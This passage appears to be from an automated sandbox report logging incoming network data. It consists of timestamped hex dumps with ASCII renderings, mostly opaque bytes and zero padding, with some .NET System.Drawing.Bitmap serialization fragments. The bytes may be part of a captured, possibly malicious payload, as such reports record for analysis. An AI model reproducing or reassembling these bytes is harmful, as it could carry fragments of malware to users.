c0 12 df 3f 16 8b 3f c4 57 e2 32 18 15 37 7d 4c 9f 76 8f c7 96 d2 50 62 c1 a7 b1 1e ca eb f3 5b c6 13 98 73 34 b6 bd 5d 87 44 53 cd 6c 69 4a Data Ascii: OR2E~-k+k99@^u\%<S]%uY0U;?>nE])ah,Z1`pSdygdGJ"8<0R\|I\d:;AKYb77Fg\|rYW/q?aN'RWDf8c")n??W27}LvPb[s4]DSliJ
2021-10-16 14:53:37 UTC	567	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
2021-10-16 14:53:37 UTC	583	IN	Data Raw: a3 9a 3d 4a 57 b0 95 da 41 b6 3f 72 2d 7f 0c 6c 2c c5 4e ba 83 29 28 ef ef fb 31 1e 9f 2a c8 e8 fa 37 8e b6 73 97 0d 0f 00 00 00 00 8d 60 45 14 51 6e 76 d3 09 da 8d b7 25 1e c6 75 9d 0e e9 54 1a ba d9 d7 fc 08 43 3b 82 b0 be cd 2f ec 78 ca b4 1b 35 b7 ca 41 36 61 34 c4 2d e8 88 77 98 2d 63 ff 6d 15 6c 8b 76 a5 d0 9d 65 ed b9 1e ef be 28 38 2a c3 1e 6f f9 86 6a 8c 74 0b a3 5a a4 14 36 87 30 ad 7d 87 a8 eb 47 63 11 82 06 63 28 a7 a0 0d 5f db ee 9e 61 f2 5c 20 48 73 41 83 ca 4e ca 11 42 54 ac 5c 7f 52 02 5a 0b 40 00 01 00 00 00 ff ff ff ff 01 00 00 00 00 00 00 00 0c 02 00 00 00 51 53 79 73 74 65 6d 2e 44 72 61 77 69 6e 67 2c 20 56 65 72 73 69 6f 6e 3d 34 2e 30 2e 30 2e 30 2c 20 43 75 6c 74 75 72 65 3d 6e 65 75 74 72 61 6c 2c 20 50 75 62 6c 69 63 4b 65 79 54 Data Ascii: =JWA?r-l,N)(17s`EQnv%uTC;/x5A6a4-w-cmlve(8ojtZ60}Gcc(_a\ HsANBT\RZ@QSystem.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyT
2021-10-16 14:53:37 UTC	599	IN	Data Raw: 11 a0 88 b7 8d c8 56 5b a5 d7 40 e3 d8 42 74 5f a7 ef 75 07 63 e6 3e ab 11 44 ed 56 6a 39 5b 2d 5a 45 34 54 0d 4a 48 eb 53 0f db 97 59 b8 57 fe 8e 53 ba 9c be 2a 85 23 c6 84 40 1a 63 db 5d b9 e9 ba 84 48 a7 41 ff 12 d2 6f 53 0a 23 cc 4f b3 69 19 9f 4b 23 ff 02 09 4d f7 4a b1 c6 2d 60 82 26 7b 9b a9 e8 0f 8f 1d c2 cf df 1a f7 8b 53 ae d2 8b c5 51 7f cd 6d f0 8f a2 54 e5 0c 33 56 ba 17 41 e6 71 a4 94 33 e5 c9 0a 54 43 e6 7c 14 d9 4f bf 63 56 c8 14 f0 c2 0a f4 fd 4d fe 50 a8 f7 15 e8 28 4f f0 59 a5 28 50 2f 84 7a 46 7a ca 26 1d 7c 5b 7b 63 d0 87 79 6c a3 ab 7c 90 d9 81 b7 42 da 60 6e b2 e5 0a 7d 56 77 e8 30 8a ee 54 f3 7e 24 d8 13 1c a0 fd 71 1e 65 24 80 cd 5e 31 ce 3a 85 9b 58 e9 e0 2c 59 a1 33 fd 3d 77 50 fb 46 c2 62 cf eb cb 9d 7f b5 7b 00 d7 6d b2 16 25 Data Ascii: V[@Bt_uc>DVj9[-ZE4TJHSYWS*#@c]HAoS#OiK#MJ-`&{SQmT3VAq3TC\|OcVMP(OY(P/zFz&\|[{cyl\|B`n}Vw0T~$qe$^1:X,Y3=wPFb{m%
2021-10-16 14:53:37 UTC	615	IN	Data Raw: d2 56 28 14 01 81 0f 4e 69 a8 1b 2d 41 c9 af c0 66 40 36 65 ba ab 8e dc bf 66 8e 99 84 19 26 ee a6 45 a4 2f e9 31 3a 89 b4 f1 a4 dc 46 7d 3a 14 10 f8 75 b3 f7 88 e3 b0 40 96 14 64 62 f8 00 f9 bb dc 16 72 a4 9d 8b a2 9f c8 94 34 06 38 ea ee ec fd 60 42 63 84 14 90 5d 15 87 a8 d7 13 2f 19 fb 47 3f ba 83 7f 81 2b 5d b0 bf f3 a6 e0 1e ad be 87 44 95 f5 c6 84 cc c6 6a 4d af cd b5 78 2d 03 89 bb ad 78 d3 08 c3 a9 5a 5f b6 5d 91 0d 8d 06 fb 02 7e d5 a4 07 14 72 66 b3 d1 a3 9c 2d 17 cf ee d2 a2 26 7f ca 70 1e c0 f6 18 91 d0 03 1b aa 95 e5 97 24 98 79 09 c8 75 57 81 18 55 19 f3 c6 39 5c 19 00 06 fa 1a 24 e1 74 ec 43 b2 f6 ef ce 95 02 58 eb eb e9 e9 38 28 2b 2f ee e3 74 39 00 d1 41 69 4c c7 01 ee e4 e9 8e 14 47 dd 24 b0 a6 c9 97 a5 c0 ae 42 65 99 31 1d 81 01 24 fd Data Ascii: V(Ni-Af@6ef&E/1:F}:u@dbr48`Bc]/G?+]DjMx-xZ_]~rf-&p$yuWU9\$tCX8(+/t9AiLG$Be1$
2021-10-16 14:53:37 UTC	631	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
2021-10-16 14:53:37 UTC	647	IN	Data Raw: eb b8 dc 4e 3d d9 25 33 d1 e0 4c 18 35 e7 29 94 ce 62 b8 8f d2 d9 30 a5 81 8b fa bd f7 ec 49 c4 4c dc 98 7b 18 15 9b 18 f3 70 8d da 4a 62 6f a1 2d ac 17 90 27 bf fb 80 99 0c ae c8 ed 3b 15 1a 57 84 be 32 11 92 76 af 1f 2c e6 9b 0c b5 5e 06 ba cd be 1d 1c e6 a1 b7 df 13 d4 e0 35 95 66 70 80 30 ec ef 84 64 6e 9a b8 5e d4 89 03 95 a7 49 50 bd ab f5 68 59 b9 66 9a 67 73 28 d9 19 b4 cd 75 51 c2 0e d6 12 87 33 d5 f8 53 31 6a b8 eb b3 41 87 6c e9 8e 8d a3 fc 4d 90 f9 19 21 5e 2f ab 54 2d 5e 81 52 b5 10 44 37 77 75 46 63 b0 34 fd a4 2d f2 27 15 e8 7a 95 1e 2e c8 a0 50 68 0d 18 89 a6 d4 74 32 e6 20 36 e4 97 72 9f ba c4 f9 bc 65 15 c2 9a 1e 53 f3 4a 59 33 d2 9c 16 f8 cc 4b 35 3f ac 60 50 f5 c1 25 b1 e6 af d0 de 04 bb e1 7b cb 06 b4 76 1a bf 28 6e 06 b5 6a 35 42 da Data Ascii: N=%3L5)b0IL{pJbo-';W2v,^5fp0dn^IPhYfgs(uQ3S1jAlM!^/T-^RD7wuFc4-'z.Pht2 6reSJY3K5?`P%{v(nj5B
2021-10-16 14:53:37 UTC	657	IN	Data Raw: a9 ec f3 e2 49 7b af 76 de 7b 5d fa dd 2e b3 0d 53 2e 80 26 7a 6e 1d d2 ba a8 f5 aa 88 ae 02 65 bc 7a a2 f8 53 0c 73 b7 4c bd 80 a2 c2 7d f7 c2 da d3 63 6c aa 2a 0d 6f 19 8f 82 f1 aa cb b7 fe b0 2f 95 53 5f 1b 50 b9 0c 03 d4 df 20 1d 6f a2 29 f4 3f 45 f8 f7 74 ae b9 2d 41 fb 29 0c 65 c6 e0 f6 db ea 48 ed 06 50 eb 30 be de a2 cd 0f 16 3f 25 46 b6 8a d5 72 62 cc b2 a1 da d1 4d 17 78 89 f6 e3 7e b5 99 d8 d8 28 df 4e 83 04 e4 71 e8 00 2d 88 e2 e4 7c 23 83 51 aa ee d3 89 0c 3c 67 82 1b a6 a1 bd 30 62 02 6a da ba 2a 8c 62 82 a9 0e 7b f6 87 69 00 cd 90 da 14 b7 0d 07 9f 1d 13 a3 e2 d5 1e 1a b4 cb d0 45 f5 1c 29 c9 ed 62 d8 ce 34 5d 51 48 62 3a 45 66 3d 48 d8 26 b1 ad d9 19 dd 4b 3c bd f4 cf 8b 11 ec be ed 24 ea cb e3 a4 39 3e ca 63 4d 55 33 93 7a 09 13 de 60 55 Data Ascii: I{v{].S.&znezSsL}clo/S_P o)?Et-A)eHP0?%FrbMx~(Nq-\|#Q<g0bjb{iE)b4]QHb:Ef=H&K<$9>cMU3z`U
2021-10-16 14:53:37 UTC	673	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
2021-10-16 14:53:37 UTC	689	IN	Data Raw: e1 2b 92 b5 30 81 4d 14 b0 6c 88 a3 d1 ed ae 8f de 1b 89 ca b3 ee df 48 a8 0f 6f fd e5 d8 c7 7c c2 90 e8 0f 11 df b8 33 9e e2 01 95 0d 0f 00 00 00 00 06 09 6e 04 eb eb e3 6d 36 3b 77 2a 4e 9d 81 ac ae 04 d6 4e 84 8d 9b 40 cf f9 bc ac 6f 58 ee 24 60 c2 f0 cb 22 53 c9 d5 29 6f 3e 4a 95 74 c6 f5 3b ae 0b d8 07 49 a8 01 57 65 33 8a bc 9d 37 64 03 4d 51 93 cd 2e 04 e0 5b 9a 72 4f d6 35 2d e4 c8 fc 8e e9 18 4f 49 e7 af 29 c2 5e 78 8d 31 dd ce ea 68 2c 28 c1 23 93 04 72 5a f3 b6 0d e7 20 7d 53 55 6c bb 1b 36 44 c5 77 cd 36 82 39 0b 40 00 01 00 00 00 ff ff ff ff 01 00 00 00 00 00 00 00 0c 02 00 00 00 51 53 79 73 74 65 6d 2e 44 72 61 77 69 6e 67 2c 20 56 65 72 73 69 6f 6e 3d 34 2e 30 2e 30 2e 30 2c 20 43 75 6c 74 75 72 65 3d 6e 65 75 74 72 61 6c 2c 20 50 75 62 6c Data Ascii: +0MlHo\|3nm6;w*NN@oX$`"S)o>Jt;IWe37dMQ.[rO5-OI)^x1h,(#rZ }SUl6Dw69@QSystem.Drawing, Version=4.0.0.0, Culture=neutral, Publ
2021-10-16 14:53:37 UTC	705	IN	Data Raw: 41 37 ce 30 6f 88 60 e0 57 7f 04 d3 84 c3 bc be 3b 8a e3 0c 2f f1 bf f1 d1 20 b5 fc 9f 7f 39 52 cb 55 3d a3 bc 99 02 72 43 af 0f a3 b4 a2 69 ee 99 2e 9a 3e 94 09 92 08 d3 1b cd d0 aa 87 a0 10 3b 62 54 f1 87 f1 16 0c a3 12 f1 7a 70 a3 0a 9a 52 23 84 09 d2 3e a8 fb 98 0a 07 12 03 a1 a8 80 b8 90 3b b1 ab ee cd 03 50 4a 83 f6 57 cf a9 c4 01 24 74 7e 8b d4 f3 22 27 43 b8 5b 70 93 92 23 72 44 dd c8 ca d0 c3 34 31 c2 1d 2f cf 48 5f 09 e0 22 4a 0c 10 cd a7 73 70 5e 33 99 2a 77 9d af 1e bb f3 65 f6 a1 85 71 6f 92 94 fd f9 87 7c d4 c0 82 3f 87 0c 56 25 59 88 5b 18 57 6c c7 a9 5a 3e f5 a4 52 6e f3 2c bd 0b 24 d7 03 fe d0 4e 04 7b a3 ac f5 2a 04 54 c5 5b bf f2 8a 0e 54 8e 48 0d 66 1b af 52 f0 ce fc 1d 73 99 11 ce 99 b0 a0 f4 55 5d fd e7 2f e1 c2 07 2f 32 63 b3 5c c2 Data Ascii: A70o`W;/ 9RU=rCi.>;bTzpR#>;PJW$t~"'C[p#rD41/H_"Jsp^3weqo\|?V%Y[WlZ>Rn,$N{T[THfRsU]//2c\
2021-10-16 14:53:37 UTC	721	IN	Data Raw: 0c 45 98 80 e4 59 de 65 55 1d 8a f1 90 de 1e 9d 69 15 03 2a 97 36 4b 06 33 6e 08 0f d2 94 67 4d 41 ed ba 8c 90 60 fb ed 23 a8 e9 6e 73 ae 2e f3 f6 2b 33 de cd e7 71 e3 ff 48 05 a3 f1 fb 2a 60 26 36 13 2b 5c 39 9c 33 5f e8 83 81 9e 93 10 6e 86 b1 83 a5 71 e6 1d c0 4d 0d 8b 57 dc a3 e6 61 8b 9a 95 a8 f2 70 df 11 15 6a 69 1e a9 ab 4e ed ec ca 06 e9 5e fe bb 66 dd fc 69 75 1c 08 50 9b 8a f3 39 7c 10 13 b1 8b fb 65 eb 12 dd 2c ad a7 1e 2e 6f ae a8 af 16 70 ff 8e 20 36 e5 7a e3 40 3e 85 d9 70 7f 4c ee 0a 10 6b 9f e5 a8 b6 f5 51 4a e0 98 dc 5c 4f fa ac 3b c9 63 50 51 ef e2 ba 25 bf 7a 25 08 39 c5 e2 5b 0b a2 84 75 f4 f5 42 9d b8 7f 34 ae 8a 44 a1 8c 4f 1b 7b 87 7a e8 e4 c1 2d 9b 85 f1 9d 09 4e 75 ac 4e 99 65 e3 87 79 89 94 94 99 a4 78 98 cc f5 e9 f1 44 83 84 ad Data Ascii: EYeUi6K3ngMA`#ns.+3qH`&6+\93_nqMWapjiN^fiuP9\|e,.op 6z@>pLkQJ\O;cPQ%z%9[uB4DO{z-NuNeyxD
2021-10-16 14:53:37 UTC	737	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
2021-10-16 14:53:37 UTC	753	IN	Data Raw: 0e 78 64 41 85 37 dd 0c 1a 82 a3 e3 4b a8 48 c7 f4 47 7a 92 e2 cb 95 c7 ad 15 70 6b 20 75 03 35 1a 71 f2 9f dc 66 a6 8e c5 e2 c9 78 c6 85 38 6a fd f3 06 df 0c e2 9a 6b 16 a2 f7 bc 50 99 cb 50 2a 65 05 17 6b 43 4c 4c b6 c7 b5 4a b8 09 59 b2 34 9e dd 83 81 e8 cb 9d 5a 51 35 90 a1 05 6b 07 78 3e b4 e0 13 46 c2 97 e2 c5 c5 3c 23 54 30 0a 38 ae 13 db 19 50 f0 35 af 01 50 45 61 48 10 10 79 ee 1f 8b 7c 04 5a 45 5f 0e 1b 5e 13 d9 59 ce f5 2b 31 f9 75 4a c7 d6 cb a5 43 72 78 05 c3 97 8d b7 76 e1 db ad f3 dc f0 2b a7 ae 62 39 d3 8d 27 f6 99 1d f0 22 f8 b0 95 9a b4 6f 98 bd 5b 5d be b5 82 e9 85 64 f7 4f 06 6c 88 d5 16 10 4a a1 aa 40 2a f8 5d 84 92 df ba 4f 73 b4 a6 b3 ff 29 b5 59 c1 7a ec 40 90 5a fc 30 3e eb 06 fa 79 d7 a2 55 74 a4 eb 5d b1 d0 a0 08 8f 5c 81 26 e3 Data Ascii: xdA7KHGzpk u5qfx8jkPPekCLLJY4ZQ5kx>F<#T08P5PEaHy\|ZE_^Y+1uJCrxv+b9'"o[]dOlJ@]Os)Yz@Z0>yUt]\&
2021-10-16 14:53:37 UTC	769	IN	Data Raw: 4b 9d 67 4a 52 c3 14 d2 ee 73 79 3e 99 de 09 a8 7d 9f d1 b5 02 e1 86 4f 23 3c 13 e3 b4 b0 95 c0 a9 14 a8 f5 1c ea 37 bc 19 e1 27 4d b2 1b ea c8 e8 35 55 2d 81 59 43 04 cd 49 94 b1 76 38 f9 62 a7 79 89 d1 ca 21 24 ac 7b c1 db a4 2d d3 e0 24 d5 2d db 60 ec 26 09 36 1c 85 f6 b3 d0 68 7d 5e 6a 82 96 30 13 3f a0 ca 08 ea 52 57 af a5 57 9e 2b fa 27 81 82 fe 76 a4 fa 97 df 4c 55 e5 7e 37 d1 3f 61 fe bf be 4f 7d f1 c5 64 09 dc de df 41 c1 02 9a cf fd 35 48 d1 a5 5c e5 e2 53 10 32 ed 5c 3f df b9 c1 fd ae 18 eb c2 b5 15 66 a0 03 99 ae 6f 3e 3d 16 18 77 46 35 5a 06 d3 a2 54 d4 ce 5d b7 e8 45 d1 27 ca 8b 32 f2 32 4a 65 cc de 25 29 1e 87 fe df 00 c5 2f fd 14 75 e0 4b 2c 43 eb ac 82 59 7d 1a 4a 5e f4 9c d1 65 d8 4d 26 03 22 ed 4b 6c 81 82 09 27 59 0c d4 c8 8d b0 f3 05 Data Ascii: KgJRsy>}O#<7'M5U-YCIv8by!${-$-`&6h}^j0?RWW+'vLU~7?aO}dA5H\S2\?fo>=wF5ZT]E'22Je%)/uK,CY}J^eM&"Kl'Y
2021-10-16 14:53:37 UTC	785	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
2021-10-16 14:53:37 UTC	801	IN	Data Raw: 6e 67 2c 20 56 65 72 73 69 6f 6e 3d 34 2e 30 2e 30 2e 30 2c 20 43 75 6c 74 75 72 65 3d 6e 65 75 74 72 61 6c 2c 20 50 75 62 6c 69 63 4b 65 79 54 6f 6b 65 6e 3d 62 30 33 66 35 66 37 66 31 31 64 35 30 61 33 61 05 01 00 00 00 15 53 79 73 74 65 6d 2e 44 72 61 77 69 6e 67 2e 42 69 74 6d 61 70 01 00 00 00 04 44 61 74 61 07 02 02 00 00 00 09 03 00 00 00 0f 03 00 00 00 e6 16 00 00 02 42 4d e6 16 00 00 00 00 00 00 36 00 00 00 28 00 00 00 2c 00 00 00 2c 00 00 00 01 00 18 00 00 00 00 00 00 00 00 00 c4 0e 00 00 c4 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: ng, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3aSystem.Drawing.BitmapDataBM6(,,
2021-10-16 14:53:37 UTC	817	IN	Data Raw: ca ca 67 79 a0 19 ff e7 64 7e 5d dc 39 c3 6e 8b e7 86 9c 3b 3c b7 b9 4d 4d 86 f0 a6 34 a4 1b de 9e c8 7e 52 ee 2f 4a c0 1c 38 50 ea 18 00 66 d0 89 b5 e0 82 1b 13 3f 53 c5 0b 3d bf c4 6b ba b0 ef 0e 1e 66 d5 b8 13 f0 4a c8 77 96 a5 1f 3e c1 32 8b 35 7d 2f 19 b5 f4 27 07 64 5b 16 50 92 7c 16 e3 cd 9a c4 13 3f 6a 12 cd 2b 59 61 7c e8 36 48 67 2f a5 dc 29 84 f0 fd 2e c6 a5 65 e4 fd ba 1a b8 f7 be 85 5c df 77 1e 78 5c 28 6a 18 78 a3 15 d7 38 24 7d e5 4e a1 e6 ce d4 d4 86 5a 1b e1 8c 9e cf cf 71 21 eb 5b 64 83 5e 01 a2 89 57 66 8a 6b c1 59 8c e9 c7 75 32 ce a1 92 a7 41 b7 6d 5c 80 52 86 1d 6b ed 5a d7 63 0a 9d 0f 90 4c 7b f8 e3 c4 18 2b 47 25 97 3b 1a 28 6f 8f 26 6a 7c b8 d8 52 81 be 9f b4 4e 23 ab 58 1f cb 1a 7e 43 b8 da c6 11 09 b1 46 d8 c4 a4 e9 59 e0 18 2c Data Ascii: gyd~]9n;<MM4~R/J8Pf?S=kfJw>25}/'d[P\|?j+Ya\|6Hg/).e\wx\(jx8$}NZq![d^WfkYu2Am\RkZcL{+G%;(o&j\|RN#X~CFY,
2021-10-16 14:53:37 UTC	833	IN	Data Raw: 1a 27 cb 12 bd e8 04 bd b2 01 d4 ae 2f e6 7d a8 8b 66 4c 09 af 31 00 45 11 9d 2e e3 f2 54 ae 6d 21 39 9f 91 3e 64 d2 a3 02 1c 9c 6c c4 66 55 bf cc 28 76 ad c9 bc c8 21 ef f5 8c 03 23 ea 30 9a d6 f3 0e 4c 03 47 df 5f 01 00 01 f5 23 5a e7 2b 80 ad 74 80 13 8d ee b1 99 d9 03 66 44 8d 0e 69 cb b0 e2 95 27 dc 2b 9a 39 68 28 f6 d9 1a ff f5 d1 0f 36 75 89 ef d8 3b 11 9c 52 92 c7 85 d3 a4 86 4b 19 2f 2e bf 78 76 a3 59 2f 14 8b d8 32 c2 1b 2c c1 20 52 46 5c 57 dd 2d 1e e1 9d d2 00 30 44 a6 53 7e df ea e6 ec a4 3d 7b 00 08 39 df 68 05 0d 30 52 ca 81 57 3f 98 0a d1 e0 a4 cf 99 52 a7 e0 d4 59 35 2c 28 68 d2 9b eb 1a e0 48 8f 87 63 48 c6 d6 f3 11 74 2f 1e e7 82 1c ae a5 0e c4 a8 3f 7b 7d 22 bb 43 3b ed b3 58 95 54 f1 26 ae c5 fe c9 8a 69 1e ce 25 8d b9 02 5c 6f bb 3b Data Ascii: '/}fL1E.Tm!9>dlfU(v!#0LG_#Z+tfDi'+9h(6u;RK/.xvY/2, RF\W-0DS~={9h0RW?RY5,(hHcHt/?{}"C;XT&i%\o;
2021-10-16 14:53:37 UTC	849	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
2021-10-16 14:53:37 UTC	865	IN	Data Raw: b6 da b4 fb 9c d8 d1 90 0a f6 4e 4d 23 e2 9f be 96 f9 71 5f 33 dc 2a d7 b3 04 c7 ee 76 d5 b4 aa ac 71 29 6a 13 37 97 a3 27 9a 7d a2 1d 04 78 6e 3f 7f 2a a2 76 da d1 f5 b3 1c f6 5f 46 e2 ac a2 c6 2e cd 6c e1 d0 e6 9b 17 45 4b 0f 15 88 28 60 77 6f 69 c5 62 9c 15 ae 5d ee 11 40 3f 21 69 e4 dc cf 75 fb d2 bc c1 e0 f8 eb b6 17 fe 75 f1 58 c1 7b 76 cb 50 04 8f 40 1f b6 a1 17 90 71 c4 0e 59 0e f3 c5 e1 d0 80 6d 69 3f 49 27 bc 4b fb 76 9d 99 ff 6b f7 cf 1d b2 04 f4 59 30 fb a0 5b bc da df f6 33 8b fd e9 28 af 6b dc 0d f6 83 6d 45 1a b0 fb 96 cc f9 6c 1d 46 23 a1 2f c3 fa 14 5a 5e d0 10 1f 22 5e 6b 84 02 4b 17 56 3b ae a5 44 59 42 9a 6b 9c 8c 94 cd 61 9b 44 c8 94 c7 bf a5 c9 5b f3 0b 14 57 b8 79 55 05 0b a4 30 e0 17 0e f0 1c 7b e8 3e 8f 13 86 95 20 af 3f 6c 12 db Data Ascii: NM#q_3vq)j7'}xn?v_F.lEK(`woib]@?!iuuX{vP@qYmi?I'KvkY0[3(kmElF#/Z^"^kKV;DYBkaD[WyU0{> ?l
2021-10-16 14:53:37 UTC	881	IN	Data Raw: 0a 4f 11 5d a1 4b 13 dd 9f b8 5f c4 dd e2 89 49 34 94 18 a6 12 9b a9 76 35 94 43 52 bf 94 e4 d9 74 46 d9 68 e3 46 e1 ce cf d0 8c 79 55 9b cc 95 51 a0 27 c2 46 7c c1 95 fe 7c 1e 6d 69 8f 5a b6 1a d2 cb e8 b2 41 cc f6 61 80 50 e8 4c 5d 88 3e ea d7 d7 70 b6 49 32 a3 37 40 18 09 16 37 cc b5 1a 90 14 03 ed b5 fe 68 76 46 3b 72 1f bf 81 bb ec 81 8a ab 3b a3 1f c1 e3 fd a5 dd c9 cc f2 7b fe 5a c2 ac 1e 68 69 2e 0a 74 24 5d a8 6d de b8 a1 59 5e 2c 08 d8 e2 c4 96 f0 0d 62 74 ed 98 66 eb d2 39 52 7f f9 a8 e5 4c 06 10 4c 07 01 d0 32 52 27 e0 0e 2f f1 eb fd 6a 68 a9 08 47 7b 26 ac 9f 52 f8 13 b7 d2 bd 3d dd cb 23 df 40 fa 3c ea 3c 9b 94 0f 0e a0 d1 bc 94 27 6d 27 22 a6 ab 06 7f 9d 56 c8 20 ca 13 85 47 11 2c 6e 53 1f 6a 80 7b 5d 3a ce f2 8c 5f e6 5c e6 f4 17 5d 56 06 Data Ascii: O]K_I4v5CRtFhFyUQ'F\|\|miZAaPL]>pI27@7hvF;r;{Zhi.t$]mY^,btf9RLL2R'/jhG{&R=#@<<'m'"V G,nSj{]:_\]V
